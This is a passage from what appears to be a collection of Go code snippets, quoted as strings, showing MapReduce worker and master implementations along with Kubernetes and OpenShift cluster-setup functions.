off;\",\n\t\t\t}\n\n\t\t\tfor _, file := range filenames {\n\t\t\t\tdb, err := sql.Open(\"sqlite3\", file)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Println(err)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tdefer db.Close()\n\n\t\t\t\trows, err := db.Query(\"select key, value from data;\",)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfmt.Println(err)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tdefer rows.Close()\n\n\t\t\t\tfor rows.Next() {\n\t\t\t\t\tvar key string\n\t\t\t\t\tvar value string\n\t\t\t\t\trows.Scan(&key, &value)\n\t\t\t\t\tsqls = append(sqls, fmt.Sprintf(\"insert into data values ('%s', '%s');\", key, value))\n\t\t\t\t}\n\t\t\t}\n\n\t\t\treduce_db, err := sql.Open(\"sqlite3\", fmt.Sprintf(\"/tmp/squinn/reduce_aggregate_%d.sql\", work.WorkerID))\n\t\t\tfor _, sql := range sqls {\n\t\t\t\t_, err = reduce_db.Exec(sql)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfmt.Printf(\"%q: %s\\n\", err, sql)\n\t\t\t\t}\n\t\t\t}\n\t\t\treduce_db.Close()\n\n\t\t\treduce_db, err = sql.Open(\"sqlite3\", fmt.Sprintf(\"/tmp/squinn/reduce_aggregate_%d.sql\", work.WorkerID))\n\t\t\tdefer reduce_db.Close()\n\t\t\trows, err := reduce_db.Query(\"select key, value from data order by key asc;\")\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\tfailure(\"sql.Query2\")\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer rows.Close()\n\n\t\t\tvar key string\n\t\t\tvar value string\n\t\t\trows.Next()\n\t\t\trows.Scan(&key, &value)\n\n\t\t\t//type ReduceFunc func(key string, values <-chan string, output chan<- Pair) error\n\t\t\tinChan := make(chan string)\n\t\t\toutChan := make(chan Pair)\n\t\t\tgo func() {\n\t\t\t\terr = reduceFunc(key, inChan, outChan)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfailure(\"reduceFunc\")\n\t\t\t\t\tlog.Println(err)\n\t\t\t\t}\n\t\t\t}()\n\t\t\tinChan <- value\n\t\t\tcurrent := key\n\n\t\t\tvar outputPairs []Pair\n\t\t\t// Walk through the file's rows, performing the reduce func\n\t\t\tfor rows.Next() {\n\t\t\t\trows.Scan(&key, &value)\n\t\t\t\tif key == current {\n\t\t\t\t\tinChan <- value\n\t\t\t\t} else {\n\t\t\t\t\tclose(inChan)\n\t\t\t\t\tp := <-outChan\n\t\t\t\t\toutputPairs = append(outputPairs, p)\n\n\t\t\t\t\tinChan = make(chan string)\n\t\t\t\t\toutChan = make(chan Pair)\n\t\t\t\t\tgo func() {\n\t\t\t\t\t\terr = reduceFunc(key, inChan, outChan)\n\t\t\t\t\t\tif err != nil {\n\t\t\t\t\t\t\tfailure(\"reduceFunc\")\n\t\t\t\t\t\t\tlog.Println(err)\n\t\t\t\t\t\t}\n\t\t\t\t\t}()\n\t\t\t\t\tinChan <- value\n\t\t\t\t\tcurrent = key\n\t\t\t\t}\n\t\t\t}\n\t\t\tclose(inChan)\n\t\t\tp := <-outChan\n\t\t\toutputPairs = append(outputPairs, p)\n\n\t\t\t// Prepare tmp database\n\t\t\t// TODO: Use the command line parameter output\n\t\t\t//db_out, err := sql.Open(\"sqlite3\", fmt.Sprintf(\"/home/s/squinn/tmp/reduce_out_%d.sql\", work.WorkerID))\n\t\t\t//db_out, err := sql.Open(\"sqlite3\", fmt.Sprintf(\"/Users/Ren/tmp/reduce_out_%d.sql\", work.WorkerID))\n\t\t\tdb_out, err := sql.Open(\"sqlite3\", fmt.Sprintf(\"%s/reduce_out_%d.sql\", output, work.WorkerID))\n\t\t\tdefer db_out.Close()\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\tfailure(fmt.Sprintf(\"sql.Open - reduce_out_%d.sql\", work.WorkerID))\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tsqls = []string{\n\t\t\t\t\"create table if not exists data (key text not null, value text not null)\",\n\t\t\t\t\"create index if not exists data_key on data (key asc, value asc);\",\n\t\t\t\t\"pragma synchronous = off;\",\n\t\t\t\t\"pragma journal_mode = off;\",\n\t\t\t}\n\t\t\tfor _, sql := range sqls {\n\t\t\t\t_, err = db_out.Exec(sql)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfailure(\"sql.Exec5\")\n\t\t\t\t\tfmt.Printf(\"%q: %s\\n\", err, sql)\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// Write the data locally\n\t\t\tfor _, op := range outputPairs {\n\t\t\t\tsql := fmt.Sprintf(\"insert into data values ('%s', '%s');\", op.Key, op.Value)\n\t\t\t\t_, err = db_out.Exec(sql)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfailure(\"sql.Exec6\")\n\t\t\t\t\tfmt.Printf(\"%q: %s\\n\", err, sql)\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t} else if resp.Type == TYPE_DONE {\n\t\t} else {\n\t\t\tlog.Println(\"INVALID WORK TYPE\")\n\t\t\tvar err error\n\t\t\treturn err\n\t\t}\n\n\n\n\t\t/*\n\t\t * Notify the master when I'm done\n\t\t */\n\n\t\treq.Type = resp.Type\n\t\treq.Address = myAddress\n\t\terr = call(master, \"Notify\", req, &resp)\n\t\tif err != nil {\n\t\t\tfailure(\"Notify\")\n\t\t\ttasks_run++\n\t\t\tcontinue\n\t\t}\n\n\t\tif resp.Message == WORK_DONE {\n\t\t\tlog.Println(\"Notified - Finished Working\")\n\t\t\tlog.Println(\"Waiting for word from master to clean up...\")\n\t\t\t// TODO: Wait for word from master\n\n\t\t\t//CleanUp\n\t\t\t/*\n\t\t\tos.Remove(\"aggregate.sql\")\n\t\t\tfor r:=0; r<work.R; r++ {\n\t\t\t\tfor m:=0; m<work.M; m++ {\n\t\t\t\t\tos.Remove(fmt.Sprintf(\"map_%d_out_%d.sql\", m, r))\n\t\t\t\t\tos.Remove(fmt.Sprintf(\"map_out_%d_mapper_%d.sql\", r, m))\n\t\t\t\t}\n\t\t\t\tos.Remove(fmt.Sprintf(\"reduce_aggregate_%d.sql\", r))\n\t\t\t}\n\t\t\t*/\n\t\t\tos.RemoveAll(\"/tmp/squinn\")\n\t\t\treturn nil\n\t\t}\n\t\ttasks_run++\n\n\t}\n\n\treturn nil\n}", "func NewMasterWorker(Jobs map[string]Job, config string, indload bool) (MasterWorker, error) {\n\tmaster := MasterWorker{\n\t\tpathjson: config,\n\t\tJobs: Jobs,\n\t}\n\terr := master.LoadConfig(config)\n\tif err != nil {\n\t\treturn master, err\n\t}\n\tif indload {\n\t\terr := master.Loadmaster()\n\t\tif err != nil {\n\t\t\treturn master, err\n\t\t}\n\t}\n\n\treturn master, nil\n}", "func (k *Kubeadm) CreateCluster() error {\n\n\tvar (\n\t\tjoinCommand string\n\t\terr error\n\t)\n\n\tif k.ClusterName == \"\" {\n\t\treturn errors.New(\"cluster name is not set\")\n\t}\n\n\terr = k.validateAndUpdateDefault()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tstartTime := time.Now()\n\n\tlog.Println(\"total master - \" + fmt.Sprintf(\"%v\", len(k.MasterNodes)))\n\tlog.Println(\"total workers - \" + fmt.Sprintf(\"%v\", len(k.WorkerNodes)))\n\n\tif k.HaProxyNode != nil {\n\t\tlog.Println(\"total haproxy - \" + fmt.Sprintf(\"%v\", 1))\n\t}\n\n\tmasterCreationStartTime := time.Now()\n\tjoinCommand, err = k.setupMaster(k.determineSetup())\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tlog.Printf(\"time taken to create masters = %v\", time.Since(masterCreationStartTime))\n\n\tworkerCreationTime := time.Now()\n\n\tif err := k.setupWorkers(joinCommand); err != nil {\n\t\treturn err\n\t}\n\n\tlog.Printf(\"time taken to create workers = %v\", time.Since(workerCreationTime))\n\n\tfor _, file := range k.ApplyFiles {\n\t\terr := k.MasterNodes[0].applyFile(file)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tif k.Networking != nil {\n\t\tlog.Printf(\"installing networking plugin = %v\", k.Networking.Name)\n\t\terr := k.MasterNodes[0].applyFile(k.Networking.Manifests)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\tlog.Println(\"no network plugin found\")\n\t}\n\n\tlog.Printf(\"Time taken to create cluster %v\\n\", time.Since(startTime).String())\n\n\treturn nil\n}", "func Worker(mapf func(string, string) []KeyValue, reducef func(string, []string) string) {\n\t// 单机运行,直接使用 PID 作为 Worker ID,方便 debug\n\tid := strconv.Itoa(os.Getpid())\n\tlog.Printf(\"Worker %s started\\n\", id)\n\n\t// 进入循环,向 Coordinator 申请 Task\n\tvar lastTaskType string\n\tvar lastTaskIndex int\n\tfor {\n\t\targs := ApplyForTaskArgs{\n\t\t\tWorkerID: id,\n\t\t\tLastTaskType: lastTaskType,\n\t\t\tLastTaskIndex: lastTaskIndex,\n\t\t}\n\t\treply := ApplyForTaskReply{}\n\t\tcall(\"Coordinator.ApplyForTask\", &args, &reply)\n\n\t\tif reply.TaskType == \"\" {\n\t\t\t// MR 作业已完成,退出\n\t\t\tlog.Printf(\"Received job finish signal from coordinator\")\n\t\t\tbreak\n\t\t}\n\n\t\tlog.Printf(\"Received %s task %d from coordinator\", reply.TaskType, reply.TaskIndex)\n\t\tif reply.TaskType == MAP {\n\t\t\t// 读取输入数据\n\t\t\tfile, err := os.Open(reply.MapInputFile)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"Failed to open map input file %s: %e\", reply.MapInputFile, err)\n\t\t\t}\n\t\t\tcontent, err := ioutil.ReadAll(file)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"Failed to read map input file %s: %e\", reply.MapInputFile, err)\n\t\t\t}\n\t\t\t// 传递输入数据至 MAP 函数,得到中间结果\n\t\t\tkva := mapf(reply.MapInputFile, string(content))\n\t\t\t// 按 Key 的 Hash 值对中间结果进行分桶\n\t\t\thashedKva := make(map[int][]KeyValue)\n\t\t\tfor _, kv := range kva {\n\t\t\t\thashed := ihash(kv.Key) % reply.ReduceNum\n\t\t\t\thashedKva[hashed] = append(hashedKva[hashed], kv)\n\t\t\t}\n\t\t\t// 写出中间结果文件\n\t\t\tfor i := 0; i < reply.ReduceNum; i++ {\n\t\t\t\tofile, _ := os.Create(tmpMapOutFile(id, reply.TaskIndex, i))\n\t\t\t\tfor _, kv := range hashedKva[i] {\n\t\t\t\t\tfmt.Fprintf(ofile, \"%v\\t%v\\n\", kv.Key, kv.Value)\n\t\t\t\t}\n\t\t\t\tofile.Close()\n\t\t\t}\n\t\t} else if reply.TaskType == REDUCE {\n\t\t\t// 读取输入数据\n\t\t\tvar lines []string\n\t\t\tfor mi := 0; mi < reply.MapNum; mi++ {\n\t\t\t\tinputFile := finalMapOutFile(mi, reply.TaskIndex)\n\t\t\t\tfile, err := os.Open(inputFile)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatalf(\"Failed to open map output file %s: %e\", inputFile, err)\n\t\t\t\t}\n\t\t\t\tcontent, err := ioutil.ReadAll(file)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatalf(\"Failed to read map output file %s: %e\", inputFile, err)\n\t\t\t\t}\n\t\t\t\tlines = append(lines, strings.Split(string(content), \"\\n\")...)\n\t\t\t}\n\t\t\tvar kva []KeyValue\n\t\t\tfor _, line := range lines {\n\t\t\t\tif strings.TrimSpace(line) == \"\" {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tparts := strings.Split(line, \"\\t\")\n\t\t\t\tkva = append(kva, KeyValue{\n\t\t\t\t\tKey: parts[0],\n\t\t\t\t\tValue: parts[1],\n\t\t\t\t})\n\t\t\t}\n\t\t\tsort.Sort(ByKey(kva))\n\n\t\t\tofile, _ := os.Create(tmpReduceOutFile(id, reply.TaskIndex))\n\t\t\ti := 0\n\t\t\tfor i < len(kva) {\n\t\t\t\tj := i + 1\n\t\t\t\tfor j < len(kva) && kva[j].Key == kva[i].Key {\n\t\t\t\t\tj++\n\t\t\t\t}\n\t\t\t\tvar values []string\n\t\t\t\tfor k := i; k < j; k++ {\n\t\t\t\t\tvalues = append(values, kva[k].Value)\n\t\t\t\t}\n\t\t\t\toutput := reducef(kva[i].Key, values)\n\n\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", kva[i].Key, output)\n\n\t\t\t\ti = j\n\t\t\t}\n\t\t\tofile.Close()\n\t\t}\n\t\tlastTaskType = reply.TaskType\n\t\tlastTaskIndex = reply.TaskIndex\n\t\tlog.Printf(\"Finished %s task %d\", reply.TaskType, reply.TaskIndex)\n\t}\n\n\tlog.Printf(\"Worker %s exit\\n\", id)\n}", "func StartMaster(configFile *goconf.ConfigFile) {\n\tSubIOBufferSize(\"master\", configFile)\n\tGoMaxProc(\"master\", configFile)\n\tConBufferSize(\"master\", configFile)\n\tIOMOnitors(configFile)\n\n\thostname := GetRequiredString(configFile, \"default\", \"hostname\")\n\tpassword := GetRequiredString(configFile, \"default\", \"password\")\n\n\tm := NewMaster()\n\n\trest.Resource(\"jobs\", MasterJobController{m, password})\n\trest.Resource(\"nodes\", MasterNodeController{m, password})\n\n\trest.ResourceContentType(\"jobs\", \"application/json\")\n\trest.ResourceContentType(\"nodes\", \"application/json\")\n\n\tListenAndServeTLSorNot(hostname)\n}", "func (m *Master) Generate(dependencies asset.Parents) error {\n\tinstallconfig := &installconfig.InstallConfig{}\n\tmign := &machine.Master{}\n\tdependencies.Get(installconfig, mign)\n\n\tvar err error\n\tuserDataMap := map[string][]byte{\"master-user-data\": mign.File.Data}\n\tm.UserDataSecretRaw, err = userDataList(userDataMap)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to create user-data secret for worker machines\")\n\t}\n\n\tic := installconfig.Config\n\tpool := masterPool(ic.Machines)\n\tnumOfMasters := int64(0)\n\tif pool.Replicas != nil {\n\t\tnumOfMasters = *pool.Replicas\n\t}\n\n\tswitch ic.Platform.Name() {\n\tcase \"aws\":\n\t\tconfig := aws.MasterConfig{}\n\t\tconfig.ClusterName = ic.ObjectMeta.Name\n\t\tconfig.Region = ic.Platform.AWS.Region\n\t\tconfig.Machine = defaultAWSMachinePoolPlatform()\n\n\t\ttags := map[string]string{\n\t\t\t\"tectonicClusterID\": ic.ClusterID,\n\t\t}\n\t\tfor k, v := range ic.Platform.AWS.UserTags {\n\t\t\ttags[k] = v\n\t\t}\n\t\tconfig.Tags = tags\n\n\t\tconfig.Machine.Set(ic.Platform.AWS.DefaultMachinePlatform)\n\t\tconfig.Machine.Set(pool.Platform.AWS)\n\n\t\tctx, cancel := context.WithTimeout(context.TODO(), 60*time.Second)\n\t\tdefer cancel()\n\t\tami, err := rhcos.AMI(ctx, rhcos.DefaultChannel, config.Region)\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(err, \"failed to determine default AMI\")\n\t\t}\n\t\tconfig.AMIID = ami\n\t\tazs, err := aws.AvailabilityZones(config.Region)\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(err, \"failed to fetch availability zones\")\n\t\t}\n\n\t\tfor i := 0; i < int(numOfMasters); i++ {\n\t\t\tazIndex := i % len(azs)\n\t\t\tconfig.Instances = append(config.Instances, aws.MasterInstance{AvailabilityZone: azs[azIndex]})\n\t\t}\n\n\t\tm.MachinesRaw = applyTemplateData(aws.MasterMachineTmpl, config)\n\tcase \"libvirt\":\n\t\tinstances := []string{}\n\t\tfor i := 0; i < int(numOfMasters); i++ {\n\t\t\tinstances = append(instances, fmt.Sprintf(\"master-%d\", i))\n\t\t}\n\t\tconfig := libvirt.MasterConfig{\n\t\t\tClusterName: ic.ObjectMeta.Name,\n\t\t\tInstances: instances,\n\t\t\tPlatform: *ic.Platform.Libvirt,\n\t\t}\n\t\tm.MachinesRaw = applyTemplateData(libvirt.MasterMachinesTmpl, config)\n\tcase \"openstack\":\n\t\tinstances := []string{}\n\t\tfor i := 0; i < int(numOfMasters); i++ {\n\t\t\tinstances = append(instances, fmt.Sprintf(\"master-%d\", i))\n\t\t}\n\t\tconfig := openstack.MasterConfig{\n\t\t\tClusterName: ic.ObjectMeta.Name,\n\t\t\tInstances: instances,\n\t\t\tImage: ic.Platform.OpenStack.BaseImage,\n\t\t\tRegion: ic.Platform.OpenStack.Region,\n\t\t\tMachine: defaultOpenStackMachinePoolPlatform(),\n\t\t}\n\n\t\ttags := map[string]string{\n\t\t\t\"tectonicClusterID\": ic.ClusterID,\n\t\t}\n\t\tconfig.Tags = tags\n\n\t\tconfig.Machine.Set(ic.Platform.OpenStack.DefaultMachinePlatform)\n\t\tconfig.Machine.Set(pool.Platform.OpenStack)\n\n\t\tm.MachinesRaw = applyTemplateData(openstack.MasterMachinesTmpl, config)\n\tdefault:\n\t\treturn fmt.Errorf(\"invalid Platform\")\n\t}\n\treturn nil\n}", "func main() {\n\tlog.LoadConfiguration(\"log.cfg\")\n\tlog.Info(\"Start Master\")\n\n\tcfg := loadMasterConfiguration()\n\n\tlog.Info(\"Setting go cpu number to \", cfg.Constants.CpuNumber, \" success: \", runtime.GOMAXPROCS(cfg.Constants.CpuNumber))\n\n\t// Start rest api server with tcp services for inserts and selects\n\tportNum := fmt.Sprintf(\":%d\", cfg.Ports.RestApi)\n\tvar server = restApi.Server{Port: portNum}\n\tchanReq := server.StartApi()\n\n\t// Initialize node manager\n\tlog.Info(\"Initialize node manager\")\n\tgo node.NodeManager.Manage()\n\tnodeBal := node.NewLoadBalancer(node.NodeManager.GetNodes())\n\tgo nodeBal.Balance(node.NodeManager.InfoChan)\n\n\t// Initialize reduce factory\n\tlog.Info(\"Initialize reduce factory\")\n\treduce.Initialize()\n\n\t// Initialize task manager (balancer)\n\tlog.Info(\"Initialize task manager\")\n\tgo task.TaskManager.Manage()\n\ttaskBal := task.NewBalancer(cfg.Constants.WorkersCount, cfg.Constants.JobForWorkerCount, nodeBal)\n\tgo taskBal.Balance(chanReq, cfg.Balancer.Timeout)\n\n\t// Initialize node listener\n\tlog.Info(\"Initialize node listener\")\n\tservice := fmt.Sprintf(\":%d\", cfg.Ports.NodeCommunication)\n\tlog.Debug(service)\n\tlist := node.NewListener(service)\n\tgo list.WaitForNodes(task.TaskManager.GetChan)\n\tdefer list.Close() // fire netListen.Close() when program ends\n\n\t// TODO: Wait for console instructions (q - quit for example)\n\t// Wait for some input end exit (only for now)\n\t//var i int\n\t//fmt.Scanf(\"%d\", &i)\n\tc := make(chan os.Signal, 1)\n\tsignal.Notify(c, os.Interrupt)\n\t<-c\n\treturn\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\treply := GetTask()\n\tid := reply.Id\n\tfilename := reply.Filename\n\n\tfor {\n\t\tif filename == \"error\" {\n\t\t\t//fmt.Printf(\"Error getting filename from master\\n\")\n\t\t\t//return\n\t\t\ttime.Sleep(1000 * time.Millisecond)\n\t\t\treply = GetTask()\n\t\t\tid = reply.Id\n\t\t\tfilename = reply.Filename\n\t\t}\n\t\t// fmt.Printf(\"Worker received filename: %s\\n\", filename)\n\n\t\tvar intermediate []KeyValue\n\t\t//intermediate := []KeyValue{}\n\n\t\tif reply.Type == \"map\" {\n\t\t\tfile, err := os.Open(filename)\n\t\t\tif err != nil {\n\t\t\t\t//log.Fatalf(\"cannot open %v\", filename)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tcontent, err := ioutil.ReadAll(file)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot read %v\", filename)\n\t\t\t}\n\t\t\tfile.Close()\n\n\t\t\tkva := mapf(filename, string(content))\n\t\t\tintermediate = append(intermediate, kva...)\n\t\t\tWriteIntermediate(intermediate, id, reply.NReduce)\n\t\t\tCompleteMapTask(id)\n\t\t} else if reply.Type == \"reduce\" {\n\t\t\tfor _, reduce_filename := range reply.FileList {\n\t\t\t\tfile, err := os.Open(reduce_filename)\n\t\t\t\tif err != nil {\n\t\t\t\t\t//log.Fatalf(\"cannot open %v\", reduce_filename)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tdec := json.NewDecoder(file)\n\t\t\t\tfor {\n\t\t\t\t\tvar kv KeyValue\n\t\t\t\t\tif err := dec.Decode(&kv); err != nil {\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t\tintermediate = append(intermediate, kv)\n\t\t\t\t}\n\t\t\t\tfile.Close()\n\t\t\t\tdefer os.Remove(reduce_filename)\n\t\t\t}\n\t\t\tsort.Sort(ByKey(intermediate))\n\t\t\t// fmt.Println(intermediate)\n\t\t\ts := []string{\"mr-out\", \"-\", strconv.Itoa(reply.Id)}\n\t\t\toname := strings.Join(s, \"\")\n\t\t\t// oname := \"mr-out-0\"\n\t\t\tofile, _ := os.Create(oname)\n\n\t\t\t//\n\t\t\t// call Reduce on each distinct key in intermediate[],\n\t\t\t// and print the result to mr-out-0.\n\t\t\t//\n\t\t\ti := 0\n\t\t\tfor i < len(intermediate) {\n\t\t\t\tj := i + 1\n\t\t\t\tfor j < len(intermediate) && intermediate[j].Key == intermediate[i].Key {\n\t\t\t\t\tj++\n\t\t\t\t}\n\t\t\t\tvalues := []string{}\n\t\t\t\tfor k := i; k < j; k++ {\n\t\t\t\t\tvalues = append(values, intermediate[k].Value)\n\t\t\t\t}\n\t\t\t\toutput := reducef(intermediate[i].Key, values)\n\n\t\t\t\t// this is the correct format for each line of Reduce output.\n\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", intermediate[i].Key, output)\n\n\t\t\t\ti = j\n\t\t\t}\n\t\t\tCompleteReduceTask(id)\n\t\t} else if reply.Type == \"exit\" {\n\t\t\tbreak\n\t\t}\n\n\t\ttime.Sleep(1000 * time.Millisecond)\n\t\treply = GetTask()\n\t\tid = reply.Id\n\t\tfilename = reply.Filename\n\t\tintermediate = []KeyValue{}\n\t}\n\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\tfor {\n\t\tt := Task{}\n\t\tcall(\"Master.Assign\", &t, &t)\n\n\t\t// TODO heart beat\n\t\t\n\t\tswitch t.Phase {\n\t\tcase MapPhase:\n\t\t\trunMap(t, mapf)\n\t\tcase ReducePhase:\n\t\t\trunReduce(t, reducef)\n\t\tdefault:\n\t\t\ttime.Sleep(1)\n\t\t}\n\t}\n}", "func (m *Master) init() {\n\tfmt.Printf(\"Initializing master...\\n\")\n\tm.phase = 0\n\tm.workerIDToTaskStatusMap = make(map[int]int)\n\tm.tasks = 0\n\tm.done = false\n\tm.taskStatusList = list.New()\n\ttaskQueue := []*TaskType{}\n\tfor i, file := range m.inputFiles {\n\t\tmapTask := TaskType{i, 0, m.nReduceTasks, []string{file}}\n\t\ttaskQueue = append(taskQueue, &mapTask)\n\t\tm.tasks++\n\t\tfmt.Printf(\"Generating Map Task: %#v\\n\", mapTask)\n\t}\n\tm.taskQueue = taskQueue\n\tgo m.checkProgress()\n}", "func NewMaster() *Master {\n\tm := &Master{\n\t\tsubMap: map[string]*Submission{},\n\t\tjobChan: make(chan *WorkerJob, 0),\n\t\tNodeHandles: map[string]*NodeHandle{}}\n\thttp.Handle(\"/master/\", websocket.Handler(func(ws *websocket.Conn) { m.Listen(ws) }))\n\treturn m\n}", "func WorkerCreation() (int, int){ // rval: Worker id, nReduce\n\tworkerMsg := WorkerMessage{}\n\n\tcall(\"Master.WorkerCreation\", &workerMsg, &workerMsg)\n\n\tfmt.Printf(\"Received ID (%v) from master\\n\", workerMsg.ID)\n\n\treturn workerMsg.ID, workerMsg.NReduce\n}", "func NewSequentialMaster(jobName string, inputFileNames []string,\n\tnumReducers uint, mapF MapFunction, reduceF ReduceFunction) *SequentialMaster {\n\treturn &SequentialMaster{\n\t\tJobName: jobName,\n\t\tInputFileNames: inputFileNames,\n\t\tNumReducers: numReducers,\n\t\tMapF: mapF,\n\t\tReduceF: reduceF,\n\t\tactive: false,\n\t}\n}", "func (mr *MapReduce) RunMaster() *list.List {\n\t// Your code here\n\tsendList := list.New()\t\t// list of jobs that need to be dispatched\n\tjobList := list.New()\t\t// list of jobs that are waiting to finish\n\tdoneChan := make(chan string)\t// dispatcher thread signals on this channel when worker finishes job successfully\n\tfailChan := make(chan struct {jobNumber int; worker string})\t// dispatched thread signals here when worker fails to process request\n\t\n\t\n\t// Add all map jobs to lists\n\tfor i := 0; i < mr.nMap; i++ {\n\t\tsendList.PushBack(i)\n\t\tjobList.PushBack(i)\n\t}\n\t\n\t// Dispatch all map jobs and wait for them to finish\n\te := sendList.Front()\n\tfor jobList.Len() > 0 {\n\t\t// dispatch jobs if any are waiting\n\t\tif e != nil {\n\t\t\tif (mr.SendJob(mr.file, Map, e.Value.(int), mr.nReduce, doneChan, failChan) == true) {\n\t\t\t\tp := e\n\t\t\t\te = e.Next()\t\t// move to next job \n\t\t\t\tsendList.Remove(p)\t// and remove current job from list only if current job successfully sent\n\t\t\t}\n\t\t}\t\n\t\t\n\t\tselect {\n\t\tcase worker := <- mr.registerChannel:\t// process new worker registrations\n\t\t\tmr.Workers[worker] = &WorkerInfo{worker, -1, false, false}\n\t\t\tfmt.Printf(\"Registered worker %v\\n\", mr.Workers[worker])\n\t\t\t\n\t\tcase worker := <- doneChan:\t\t\t\t// take finished jobs off the jobList and mark the worker as free\n\t\t\tmr.Workers[worker].busy = false\n\t\t\tjobList.Remove(FindListElement(jobList, mr.Workers[worker].currentJobNumber))\n\t\t\tmr.Workers[worker].currentJobNumber = -1\n\t\t\t\n\t\tcase failure := <- failChan:\t\t\t// if any job fails, re-add the job to the sendList and mark the worker as failed \n\t\t\tsendList.PushBack(failure.jobNumber)\n\t\t\tmr.Workers[failure.worker].failed = true\n\t\t\t\n\t\t}\n\t\t\n\t}\n\t\n\tsendList.Init()\t// clear the lists\n\tjobList.Init()\n\t\n\t// Add all reduce jobs to the lists\n\tfor i := 0; i < mr.nReduce; i++ {\n\t\tsendList.PushBack(i)\n\t\tjobList.PushBack(i)\n\t}\n\t\n\t// Dispatch all reduce jobs and wait for them to finish\n\te = sendList.Front()\n\tfor jobList.Len() > 0 {\n\t\t// dispatch jobs if any are waiting\n\t\tif e != nil {\n\t\t\tif (mr.SendJob(mr.file, Reduce, e.Value.(int), mr.nMap, doneChan, failChan) == true) {\n\t\t\t\tp := e\n\t\t\t\te = e.Next()\t\t// move to next job \n\t\t\t\tsendList.Remove(p)\t// and remove current job from list only if current job successfully sent\n\t\t\t}\n\t\t}\t\n\t\t\n\t\tselect {\n\t\tcase worker := <- mr.registerChannel:\t// process new worker registrations\n\t\t\tmr.Workers[worker] = &WorkerInfo{worker, -1, false, false}\n\t\t\tfmt.Printf(\"Registered worker %v\\n\", mr.Workers[worker])\n\t\t\t\n\t\tcase worker := <- doneChan:\t\t\t\t// take finished jobs off the jobList and mark the worker as free\n\t\t\tmr.Workers[worker].busy = false\n\t\t\tjobList.Remove(FindListElement(jobList, mr.Workers[worker].currentJobNumber))\n\t\t\tmr.Workers[worker].currentJobNumber = -1\n\t\t\t\n\t\tcase failure := <- failChan:\t\t\t// if any job fails, re-add the job to the sendList and mark the worker as failed \n\t\t\tsendList.PushBack(failure.jobNumber)\n\t\t\tmr.Workers[failure.worker].failed = true\n\t\t}\n\t\t\n\t}\n\t\n\treturn mr.KillWorkers()\t\t// kill the workers and return\n}", "func newMaster(name, binDir, rootDir string, loggers []Logger) *Master {\n\treturn &Master{\n\t\tprocBase: newProcBase(name, join(binDir, \"master\"), genLocalAddr(), loggers),\n\t\tmasterRoot: join(rootDir, name),\n\t\traftRoot: join(rootDir, name, \"raft\"),\n\t}\n}", "func main() {\n \tfmt.Println(\"Welcome to my MapReduce!\");\n\n\tif len(os.Args) != 4 {\n\t\tfmt.Printf(\"%s: see usage comments in file\\n\", os.Args[0])\n\t} else if os.Args[1] == \"master\" {\n\t\tif os.Args[3] == \"sequential\" {\n\t\t\tmapreduce.RunSingle(5, 3, os.Args[2], Map, Reduce)\n\t\t} else {\n\t\t\tmr := mapreduce.MakeMapReduce(5, 3, os.Args[2], os.Args[3])\n\t\t\t// Wait until MR is done\n\t\t\t<-mr.DoneChannel\n\t\t}\n\t} else {\n\t\tmapreduce.RunWorker(os.Args[2], os.Args[3], Map, Reduce, 100)\n\t}\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\tisMapFinished := false\n\tfor isMapFinished != true {\n\t\tresp := CallAssignMapTask()\n\t\tmaptask := resp.Task\n\t\tnReduce := resp.NReduce\n\n\t\tif maptask.TaskNum != -1 {\n\t\t\tfile, err := os.Open(maptask.Filename)\n\t\t\tdefer file.Close()\n\n\t\t\tlog.Printf(\"[Worker %v] Starting on map task: %+v\\n\", os.Getpid(), maptask.Filename)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot open map file %v\\n\", err)\n\t\t\t}\n\t\t\tcontent, err := ioutil.ReadAll(file)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot read %v\\n\", maptask.Filename)\n\t\t\t}\n\t\t\tmaptask.Result = mapf(maptask.Filename, string(content))\n\n\t\t\tintermediate := make(map[int][]KeyValue)\n\t\t\tfor _, kv := range maptask.Result {\n\t\t\t\treduceTaskNum := ihash(kv.Key) % nReduce\n\t\t\t\tintermediate[reduceTaskNum] = append(intermediate[reduceTaskNum], kv)\n\t\t\t}\n\n\t\t\tfor i := 0; i < nReduce; 